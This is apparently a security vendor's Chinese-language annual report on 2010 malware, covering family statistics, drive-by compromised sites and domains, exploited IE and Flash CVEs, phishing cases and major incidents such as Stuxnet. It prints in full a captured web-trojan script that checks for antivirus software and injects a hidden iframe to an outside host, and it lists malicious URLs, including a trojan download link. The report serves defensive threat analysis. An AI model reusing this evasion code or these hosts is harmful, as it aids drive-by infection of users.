一、2010年恶意代码疫情统计与分析
1. 2006-2010年恶意代码数据对比
2010年捕获的恶意代码总量为939.7721万个,与2009年相比,增长了30%。
2. 2010年捕获恶意代码月度统计
从每月捕获的恶意代码疫情来看,12月份疫情最为严重,达到了123.61万个,2月份疫情最低,仅有45.1861万个。
3. 2010年捕获恶意代码分类统计
2010年捕获的恶意代码,其中以木马数量最多,占总比例的67%;黑客工具最少,占总比率的1%。
4. 2010年各类恶意代码捕获数量月度统计
2010年各类恶意代码月度捕获数量最多的是木马,由于木马占有量最大,其走势曲线较为明显,其增长幅度直接影响整体的恶意代码数量。
5. 2010与2009年捕获恶意代码数量分类对比
2010与2009年各类恶意代码数量对比,其中以木马数量增长速度最快,与2009年相比增长了40%。
6. 2010年恶意代码样本按行为分类对比
2010年恶意代码样本按行为分类统计,网络游戏盗号木马排在第一位,已达到了170万个。
7. 2010年各类恶意代码家族TOP10
2010木马家族Top10 |
序号 |
家族名称 |
数量 |
1 |
Trojan/Win32.Kykymber |
1024982 |
2 |
Trojan/Win32.OnLineGames |
591620 |
3 |
Trojan/Win32.Agent |
514697 |
4 |
Trojan/Win32.Lipler |
425968 |
5 |
Trojan/Win32.Patched |
354518 |
6 |
Trojan/Win32.Nilage |
304931 |
7 |
Trojan/Win32.Cosmu |
204048 |
8 |
Trojan/Win32.VB |
187355 |
9 |
Trojan/Win32.CodecPack |
167425 |
10 |
Trojan/Win32.WOW |
155195 |
2010年后门家族Top10 |
序号 |
家族名称 |
数量 |
1 |
Backdoor/Win32.Hupigon |
140159 |
2 |
Backdoor/Win32.Agent |
51998 |
3 |
Backdoor/Win32.Bifrose |
51239 |
4 |
Backdoor/Win32.Poison |
34949 |
5 |
Backdoor/Win32.Rbot |
21335 |
6 |
Backdoor/Win32.PcClient |
19276 |
7 |
Backdoor/Win32.Koutodoor |
18885 |
8 |
Backdoor/Win32.Ripinip |
18558 |
9 |
Backdoor/Win32.Udr |
14178 |
10 |
Backdoor/Win32.Turkojan |
11743 |
2010年蠕虫家族Top10 |
序号 |
家族名称 |
数量 |
1 |
Worm/Win32.Allaple |
259777 |
2 |
Worm/Win32.VB |
186070 |
3 |
Worm/Win32.VBNA |
106648 |
4 |
Worm/Win32.Ridnu |
62192 |
5 |
Worm/Win32.Palevo |
44732 |
6 |
Worm/Win32.Qvod |
38153 |
7 |
Worm/Win32.AutoRun |
35065 |
8 |
Worm/Win32.Mabezat |
34419 |
9 |
Worm/Win32.Runouce |
34399 |
10 |
Worm/Win32.AutoIt |
23177 |
2010年感染式家族Top10 |
序号 |
家族名称 |
数量 |
1 |
Virus/Win32.VB |
81667 |
2 |
Virus/Win32.Virut |
78689 |
3 |
Virus/Win32.Parite |
44157 |
4 |
Virus/Win32.Krepper |
16200 |
5 |
Virus/Win32.Hidrag |
9503 |
6 |
Virus/Win32.Neshta |
4720 |
7 |
Virus/Win32.Xorala |
4694 |
8 |
Virus/Win32.Small |
3926 |
9 |
Virus/Win32.Tenga |
2173 |
10 |
Virus/Win32.HLLP |
1805 |
2010年恶意插件家族Top10 |
序号 |
家族名称 |
数量 |
1 |
AdWare/Win32.BHO |
89791 |
2 |
AdWare/Win32.InstantAccess |
40559 |
3 |
AdWare/Win32.Adnur |
34622 |
4 |
AdWare/Win32.Cinmus |
10869 |
5 |
AdWare/Win32.Virtumonde |
6479 |
6 |
AdWare/Win32.Agent |
5624 |
7 |
AdWare/Win32.Hotbar |
3993 |
8 |
AdWare/Win32.Gamevance |
3667 |
9 |
AdWare/Win32.EZula |
3631 |
10 |
AdWare/Win32.Zwangi |
3132 |
2010年黑客工具家族Top10 |
序号 |
家族名称 |
数量 |
1 |
HackTool/Win32.Sniffer |
3473 |
2 |
HackTool/Win32.Agent |
1112 |
3 |
HackTool/Win32.Crypt |
948 |
4 |
HackTool/Win32.Kiser |
899 |
5 |
HackTool/Win32.VB |
646 |
6 |
HackTool/Win32.Delf |
587 |
7 |
HackTool/Win32.VKTools |
375 |
8 |
HackTool/Win32.Jakuz |
299 |
9 |
HackTool/Win32.Xarp |
274 |
10 |
HackTool/Win32.QQMima |
254 |
8. 2010年恶意代码加壳类型统计
2010年,加壳的恶意代码数量为1787176个,占样本总量的19%;而在恶意代码加壳类型对比中,UPX壳占比最大,占加壳样本总量的28%。
9. 2010年每月恶意代码新增家族统计
2010年每月恶意代码新增家族统计中, 10月份捕获新增家族最多数量为1872个,8月份捕获的新增数量最低,只有1331个。
10. 2010年恶意代码新增家族统计TOP10
2010年恶意代码新增家族统计TOP10 |
序号 |
家族名称 |
数量 |
1 |
Trojan/Win32.Powp |
4297 |
2 |
Trojan/Win32.Drooptroop |
4252 |
3 |
Backdoor/Win32.Yobdam |
2982 |
4 |
Trojan/Win32.Jorik |
2794 |
5 |
Backdoor/Win32.Ripinip |
2331 |
6 |
Trojan/Win32.Vedio |
1897 |
7 |
Trojan/Win32.SpyEyes |
1793 |
8 |
Trojan/Win32.Cadro |
1737 |
9 |
Rootkit/Win32.Bubnix |
1444 |
10 |
Trojan/Win32.Frethoq |
1355 |
二、网络挂马
据安天实验室网络安全中心数据统计显示,2010年度拦截挂马网页数量612万个,相比2009年挂马数量降低了7%;恶意网站大部分来自于我国的广东地区;恶意域名方面,利用最多的是“.org”;挂马方式上,挂马者更青睐于在被挂马页面中嵌入并调用外部的JS文件,因为此方法比以框架插入方式更为隐蔽;通过访问挂马网站而非法下载的病毒文件,主要以网络游戏盗号类木马为主。
为了加快木马的传播速度,黑客盯住了那些具有高流量的网站,如猫扑、网易、新浪等大型网站在2010年都曾发生过挂马事件。挂马者不断挖掘新的漏洞,利用0Day漏洞进行挂马是黑客最喜欢的攻击手段之一,2010年出现的被应用于挂马的高危漏洞有“极光”漏洞(CVE-2010-0249)、“极风”漏洞(CVE-2010-0806)、CVE-2010-3962漏洞等,其中CVE-2010-0806也是2010年黑客挂马利用最多的漏洞。
1. 恶意网站统计
2010年,共拦截恶意网站612万个,与2009年相比降低了9%。
2. 恶意网站的地域分布
2010年,纵观中国大陆地区恶意网站的地域分布,经统计大部分来自于广东省,占总比例的47%。
3. 恶意网站排名TOP10
从2010年截获的恶意网站统计来看,最活跃的恶意域名如下:
| 排名 |
恶意域名 |
1 |
www.w22rt.com |
2 |
annil.8866.org |
3 |
a.ppmmoo.cn |
4 |
lsrc.cn |
5 |
vod123.8866.org |
6 |
ferrari10.7766.org |
7 |
jjeffyfc19.info |
8 |
web.9bic.net |
9 |
ghtoto.3322.org |
10 |
ada.bij.pl |
4. 恶意域名类型统计
根据2010年来对恶意网站域名类型统计来看,黑客利用“.org”域名最多,占总比例的80.3%;而在2009年同期,“.cn”域名利用最多,由于 2009年12月14日,中国互联网中心宣布停止对个人用户注册,该措施有效地遏制了在2010年“.cn”域名的恶意网站增长势头。
5. 网马利用漏洞类型统计
2010年网马漏洞利用方面,与2009年相比有较大变化,由集成漏洞转向了利用单一漏洞挂马的趋势。微软出现了3个高危0day网马漏洞,依次是微软MS10-002中修复的CVE-2010-0249漏洞、MS10-018中修复的CVE-2010-0806、MS10-090中修复的CVE-2010-3962,其中的CVE-2010-0806是挂马者最常用的漏洞。
6. 利用网马传播的木马排名TOP10
经统计,2010年通过挂马网站传播的木马,主要以网游盗号类木马居多,可见挂马者目的性很强,纯粹为了利益,其次是木马下载器、“点击器”等木马。
| 排名 |
病毒名 |
1 |
Trojan/Win32.OnLineGames.bnlz[GameThief] |
2 |
Trojan/Win32.Nilage.bxy[GameThief] |
3 |
Trojan/Win32.OnLineGames.igx[GameThief] |
4 |
Trojan/Win32.Agent.dqhi[Downloader] |
5 |
Trojan/Win32.Magania.dsge[GameThief] |
6 |
Trojan/Win32.OnLineGames.uszg[GameThief] |
7 |
Trojan/Win32.VB.fjo[Clicker] |
8 |
Trojan/Win32.OnLineGames.bnsm[GameThief] |
9 |
Trojan/Win32.VB.iri[Downloader] |
10 |
Trojan/Win32.Agent.qqf[Clicker] |
7. 2010年挂马网站类型统计
挂马在不同类型的网站占比也是不同的,2010年挂马网站分类对比图中列出了各个不同类别网站的占比。其中以娱乐网站占比最多为35%,游戏网站占比22%排在第二位。这两类网站关注范围大,点击次数多,直接促使网马的占比提升。
8. 2010年知名网站挂马TOP10
知名网站因为访问流量大,这一点正是被黑客看重的原因,一旦知名网站被挂马,那么木马的传播量与传播速度则会相当惊人。以下是2010年最具有影响力的挂马网站排名TOP10。
| 发现时间 |
被挂马网站 |
链接 |
2010-01-27 |
网易 |
http://blog.163.com/hualiwo123456/blog/static/137868027201002573932750/ |
2010-01-20 |
博客大巴 |
http://ndyle.blogbus.com/ |
2010-03-05 |
39健康网 |
http://zxk.39.net/zx/xiangmu/69679.html |
2010-04-21 |
IT168 |
http://diybbs.it168.com/thread-58888-1-1.html |
2010-05-20 |
58同城 |
http://zixun.58.com/aoyun/html_list/?wow/ |
2010-05-31 |
猫扑 |
http://bbs.game.mop.com/index.php |
2010-06-29 |
扬子晚报 |
http://www.yangtse.com/bbs/templates/colors/1234.html |
2010-10-12 |
新东方 |
http://www.neworiental.org/cd/question/100.html |
2010-10-18 |
新浪 |
http://mall.house.sina.com.cn/rj/data/4.htm?www.yishui.info |
2010-10-27 |
赛迪网 |
http://isc.ccidnet.com/2009/lzg/lzg.html |
9. 2010年政府网站挂马TOP10
政府网站是向全社会宣传和展示政府形象的平台,由于一些政府网站网络安全方面做的相对薄弱,因此屡遭挂马攻击,网民们愿意相信政府网站是安全可信任的,由此频繁访问被挂马的政府网站也导致了木马快速的传播,以下是2010年政府网站挂马TOP10。
| 发现时间 |
被挂马网站 |
链接 |
2010-01-22 |
福安市人民政府 |
http://fjfa.gov.cn/video/Index.html |
2010-02-09 |
宁夏回族自治区人民检察院 |
http://www.nxjc.gov.cn/jcdt/2009-03-16/747.html |
2010-03-09 |
内蒙古自治区卫生厅 |
http://www.nmwst.gov.cn/web/index.php |
2010-07-01 |
青海省国土资源厅 |
http://www.qhlr.gov.cn/list/119.html |
2010-07-13 |
湖南省招标投标监管网 |
http://www.bidding.hunan.gov.cn/item/list/12208.html |
2010-07-19 |
甘南藏族自治州人民政府 |
http://www.gn.gansu.gov.cn/html/2006-12/dfb/news/b5e7a2b542fbb1d5.html |
2010-07-27 |
国家商务部--短信商务网 |
http://mobile.mofcom.gov.cn/news/198d5a7f0bf77a19.html |
2010-08-18 |
霍州市人民政府 |
http://www.huozhou.gov.cn/com1/news/oin1.asp?html=/id/?RAANS./about:blank |
2010-11-02 |
成都市人民防空网 |
http://www.cdrf.gov.cn/news/225.html |
2010-11-24 |
四川省物价局 |
http://www.scpi.gov.cn/chsj/zyzn/images/1.html |
10. 2010年高校网站挂马TOP10
高校是芸芸学子向往的地方,然而高校网站的网络安全环境却另人堪忧,每年都有众多慕名访问“XX知名大学”而不幸中马的用户,以下是2010年高校挂马排名TOP10。
|
发现时间 |
被挂马网站 |
链接 |
2010-01-07 |
上海交通大学 |
http://oe.sjtu.edu.cn/ser/1/news.asp?6086.html |
2010-02-04 |
中国农业大学 |
http://ciee.cau.edu.cn/dqpy/index.asp |
2010-04-29 |
北京外国语大学 |
http://hq.bfsu.edu.cn/Index.html |
2010-05-19 |
复旦大学 |
http://www.optics.fudan.edu.cn/news/wow/1588.html |
2010-05-26 |
清华大学 |
http://hy.tsinghua.edu.cn/ |
2010-06-23 |
武汉大学 |
http://sim.whu.edu.cn/diaocha/image/cdk/2103.html |
2010-06-30 |
北京师范大学 |
http://erm.bnu.edu.cn/ |
2010-08-02 |
哈尔滨工业大学 |
http://mpa.hit.edu.cn/aux.show.asp?dy=210061598 |
2010-08-11 |
华中师范大学 |
http://ioppweb.ccnu.edu.cn/templets/plus/news/wow1/aio7.php?html=/OFIBCBM/FUVAJ./
about:blank |
2010-09-03 |
中国人民大学 |
http://io.ruc.edu.cn/list.asp?/fAILT.html |
11. 2010年出现的网马及事件追踪
1.“极光”漏洞
2010年1月14日,微软官方发布安全通报979352,CVE编号为CVE-2010-0249,代号为“Aurora”,此漏洞涉及到IE6、IE7、IE8,21日微软在安全公告上发布的MS10-002修复了这一高危漏洞。
典型案例:2010年1月20日,搜捕论坛(http://bbs.51sobu.com/)被挂马,黑客利用的便是MS10-002漏洞。
2.“极风”漏洞
2010年3月9日,微软官方发布安全通报981374,CVE编号为CVE-2010-0806,此漏洞涉及到IE6、IE7、IE8,30日微软在安全公告上发布的MS10-018修复了这一高危漏洞。
典型案例:2010年3月24日,沈阳公安交警信息网(http://www.sygajj.gov.cn/)被挂马,黑客利用的便是MS10-018漏洞。
3.Adobe Flash Player漏洞
2010年6月4日,Adobe公司旗下的Adobe Flash Player、Adobe Reader 、Acrobat爆出0day漏洞,CVE编号为CVE-2010-1297,Adobe已经确定Adobe Flash Player 10.0.45.2或更早的版本存在漏洞,安装Adobe Reader and Acrobat 9.x版本的Windows,此漏洞可能引起崩溃并且允许远程攻击者控制受影响的系统。
典型案例:2010年6月10日,长安大学(http://roadtunnel.chd.edu.cn/dede/coimg/100.html)被挂马,黑客利用的便是Adobe Flash Player漏洞(CVE-2010-1297)。
4.CVE-2010-3962漏洞
2010年11月3日,微软官方发布安全通报2458511,此漏洞CVE编号为CVE-2010-3962,涉及到IE6、IE7、IE8,12月14日微软在安全公告上发布的MS10-090修复了这一高危漏洞。
案例分析:2010年11月24日,中国电影资料馆(http://www.cfa.gov.cn/dwfwzn/dz)页面被挂马,黑客利用的便是MS10-090漏洞(CVE-2010-3962)。
12. 网页木马的“反侦察”手段
挂马者为了防止杀软对网马检测,在代码中加入了对相关安全产品的检测,如果发现有这些安全产品,便不执行网马代码,以使自身存活的周期更长。
案例分析:
在2月份,捕获的很多挂马网站都会调用这个恶意页面(http://bbs.xcdx169.net/include /log.js?YPWRUTWT),从下面代码中我们可以看出,黑客利用RES协议来判断用户的主机是否存在360安全卫士、瑞星等反网马安全软件,如果存在这两款安全软件相关的资源文件,那么将不会触发最终的网马页面。
“http://bbs.xcdx169.net/include/log.js?YPWRUTWT”页面完整代码:
function panduan()
{
jc_list = ['res://C:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://D:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://C:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://D:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://e:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://f:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://e:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://f:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://C:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://D:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://E:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://F:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://C:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://D:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://E:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://F:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172'];
for ( i= 0; i<jc_list.length; i++)
{
ischeck = 1;
x = new Image();
x.src = "";
x.onerror = function()
{
ischeck = 0;
}
x.src = jc_list[i];
if (ischeck == 1)
return 1;
delete x;
}
return 0;
}
if(!panduan())
{
document.writeln("<iframe src=http:\/\/game.hsw.cn\/plus\/img\/logo.html?人06 width=100 height=0><\/iframe>");
var a3742tf="51la";var a3742pu="";var a3742pf="51la";
var a3742su=window.location;var a3742sf=document.referrer;var a3742of="";
var a3742op="";var a3742ops=1;var a3742ot=1;var a3742d=new Date();
var a3742color="";if (navigator.appName=="Netscape"){a3742color=screen.pixelDepth;} else {a3742color=screen.colorDepth;}
try{a3742tf=top.document.referrer;}catch(e){}
try{a3742pu =window.parent.location;}catch(e){}
try{a3742pf=window.parent.document.referrer;}catch(e){}
try{a3742ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
a3742ops=(a3742ops==null)?1: (parseInt(unescape((a3742ops)[2]))+1);var a3742oe =new Date();
a3742oe.setTime(a3742oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3742ops+ ";path=/;expires=
"+a3742oe.toGMTString();a3742ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
if(a3742ot==null){a3742ot=1;}else{a3742ot=parseInt(unescape((a3742ot)[2]));
a3742ot=(a3742ops==1)?(a3742ot+1):(a3742ot);}a3742oe.setTime(a3742oe.getTime()+365*24*60*60*1000);
document.cookie="AJSTAT_ok_times="+a3742ot+";path=/;expires="+a3742oe.toGMTString();}catch(e){}
a3742of=a3742sf;if(a3742pf!=="51la"){a3742of=a3742pf;}
if(a3742tf!=="51la"){a3742of=a3742tf;}a3742op=a3742pu;try{lainframe}catch(e){a3742op=a3742su;}
document.write('<img style="width:0px;height:0px" src="http://web2.51.la:82/go.asp?svid=4&id=3483742&tpages=
'+a3742ops+'&ttimes='+a3742ot+'&tzone='+(0-a3742d.getTimezoneOffset()/60)+'&tcolor='+a3742color+'&sSize='+screen.width+'
,'+screen.height+'&referrer='+escape(a3742of)+'&vpage='+escape(a3742op)+'" />');
} |
13. 网马中藏有“木马”解密代码
当含有漏洞的用户系统访问挂马网站时,会从恶意网站上自动下载木马并运行,挂马者为了防止分析人员直接分析木马,首先对木马进行加密,然后在网马的shellcode中添加了解密代码,这样才触发网马时才可以解密并执行木马,分析人员即使下载了木马,没有密钥同样无法运行木马。
案例分析:
2010年5月31日,安天实验室发现,猫扑·游戏频道综合社区(http://bbs.game.mop.com /index.php)被挂马,利用的是MS10-018漏洞,木马链接为(http://yyyyy.crabdance.com/wbem /image/system.exe),然而单独下载“system.exe”后运行无效后,对此进行了深入分析。
PE文件头16进制表示为4D 5A,我们用UE以16进制打开“system.exe”,可以看出此文件的前两位D8 CF,用D8异或4D、 CF异或5A就得到了密钥95,由此我们得知此病毒文件是通过异或95进行加密的;然而加密手段有很多,异或只是其中的一种,具体情况要具体分析。
14. 利用搜索引擎优化挂马
挂马攻击有很多,2010年,出现的利用搜索引擎优化(SEO)技术展开挂马攻击便是其中的一种方法。人们在遇到问题时,往往更依赖于网络通过搜索引擎去寻求答案,对于前几位排名的搜索结果更是信任有加,黑客便利用这点,首先入侵到一些知名网站,拿到权限后,把一些人群感兴趣隐藏着恶意代码的文章上传到该网站上,这样搜索引擎会优先录入这些页面,当这一些人通过关键字搜索时,当点击含有这些关键字的恶意页面,当含有漏洞的系统触发这些恶意代码时,就成为了任人摆布的“肉鸡”。因此,搜索引擎已成为网马传播的主要途径。
案例分析:
2010年7月12日,通过Google搜索引擎搜索魔兽游戏关键字 “wowdz手法”,搜索到的结果有86,800条,对第一页给出每个链接逐个进行分析,含有恶意代码的链接已经用红色方框注明,经分析除了“百度知道”,其余全是挂马页面。
为了发现有多少政府网站、教育网站被植入恶意代码,安天对此事件进行了深入分析,分别以“wowdz手法”匹配政府网站域名“.gov.cn”,搜索出6810条记录、匹配教育网站域名“.ecu.cn”,搜索出6580条记录,分别对政府网站、教育网站搜索结果的前10页进行分析,去重后(一个网站可能有多个页面被挂马,这里只取其中一条记录),发现共有57个政府网站和36个教育网站被挂马。
政府网站域名(.gov.cn)被挂马部分数据:
教育网站域名(.edu.cn)被挂马部分数据:
三、网络钓鱼
网络钓鱼(Phishing),是指不法分子(钓鱼者)采用虚假的含有诱惑性的信息引诱用户访问经过伪装过的钓鱼网站,从而诈骗用户利益。
网络钓鱼是黑色产业链谋取利益的主要途径之一,2010年是近几年来网络钓鱼疫情最为严重的一年,网络钓鱼给用户带来的个人财产威胁已无处不在。随着互联网的发展,广大网民的安全意识不断增强,传统的钓鱼方式不足以让更多的网络用户受到欺骗。为了谋取更多的利益,“钓鱼者”费劲心思,在钓鱼手段上与传统的网络钓鱼有了很大的提升,比以往的钓鱼方式伪装性更高、欺骗性更强、传播渠道更广、诈骗手段更加多样化,通过各种渠道传播钓鱼信息,如电子邮件、聊天工具、论坛、木马病毒、手机短信等,伪装网站更是包含了金融、购物、医疗、门户网站等多种类型;钓鱼者不仅从网络钓鱼直接诈骗用户的钱财,还能间接的通过钓鱼网站搜集大量的用户隐私信息,在地下黑市进行交易获取经济利益。
1. 2010年新钓鱼方式——利用QQ发送离线文件进行钓鱼
2010年,安天实验室监测到很多利用QQ发送离线文件进行钓鱼的事件,QQ用户收到的离线文件的文件名包含“幸运用户”字样,离线文件扩展名包含“.txt”、“.mht”等, 离线文件的内容包含中奖信息,文件内部链接地址指向钓鱼网站(http://qqee.in),经分析发现,钓鱼者利用“QQ尾巴”病毒传播钓鱼信息,感染此病毒的用户会自动把含有钓鱼信息的离线文件发给在线好友,由于是好友发来的信息通常会比较信任,因此被虚假钓鱼信息所骗。
1)用户好友发来的离线文件截图:
2)打开离线文件(“幸运用户”:hytguhihfxuy897654w4ru7ty8ot.mht”),内容如下:
2. 2010年新钓鱼方式——借助相似跳转域名进行钓鱼
2010年,在广州亚运会即将来临之际,安天实验室监测到借与广州亚运会相似跳转域名QQ钓鱼事件,这是目前捕获到国内比较典型的借助相似跳转域名进行钓鱼的案例。
用户打开此钓鱼页面(http://520qq.co.cc/ip/)后,会发现导航栏上有“互联网公证处”的标识,其链接指向到“http://gz2010.cn.to/”虚假的互联网公证处页面,如下图所示:
3. 2010年新钓鱼方式——利用短域名进行钓鱼
2010年,安天实验室监测到很多用户QQ邮箱里都收到含有“http://is.gd/by1s6”链接的钓鱼信息,这是目前捕获到国内比较典型的利用短域名进行钓鱼的案例。用户在打开含有钓鱼信息的短域名网站链接后,将跳转到“http://aq.qq.com.centeat.com/”钓鱼页面。如果按照页面提示如实填写信息,会被窃取用户的敏感信息,以至于蒙受经济损失。
四、2010年重大网络安全事件
1. 百度被攻击事件
2010年1月12日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈,12时左右基本恢复正常;18时 许百度发布官方版本公告;对事故原因说明为:“因www.baidu.com的域名在美国域名注册商处被非法篡改,导致全球多处用户不能正常访问百度”。
报告链接:112百度域名劫持事件关联分析报告
2. 多家企业网络入侵事件传言的同源木马样本分析
2009年12月至2010年1月间,多家国际大型企业网络遭受了入侵攻击,对此,相关报道、媒体以及网络传言都有不同说法,从相关消息汇总来看,其中相对有依据的说法来自几家国际安全厂商,包括Symantec、Mcafee、TrendMacro等,综合根据各厂商已经发布的分析报告和有关报道,较多的结论是相关企业的工作人员受到针对客户端程序的0 Day漏洞攻击(业内主要认为是IE浏览器相关漏洞,这个漏洞已经被命名为“极光”),进而被植入了木马。
报告链接:多家企业网络入侵事件传言的同源木马样本分析报告
3. Stuxnet蠕虫攻击工业控制系统事件
国内外多家媒体相继报道了Stuxnet蠕虫对西门子公司的数据采集与监控系统SIMATIC WinCC进行攻击的事件,称其为“超级病毒”、“超级工厂病毒”,并形容成“超级武器”、“潘多拉的魔盒”。
Stuxnet蠕虫(俗称“震网”、“双子”)在今年7月开始爆发。它利用了微软操作系统中至少4个漏洞,其中有3个全新的零日漏洞;为衍生的驱动程序使用有效的数字签名;通过一套完整的入侵和传播流程,突破工业专用局域网的物理限制;利用WinCC系统的2个漏洞,对其开展攻击。它是第一个直接 破坏现实世界中工业基础设施的恶意代码。据赛门铁克公司的统计,目前全球已有约45000个网络被该蠕虫感染,其中60%的受害主机位于伊朗境内。伊朗政府已经确认该国的布什尔核电站遭到Stuxnet蠕虫的攻击。
报告链接:对Stuxnet蠕虫攻击工业控制系统事件的综合报告 |
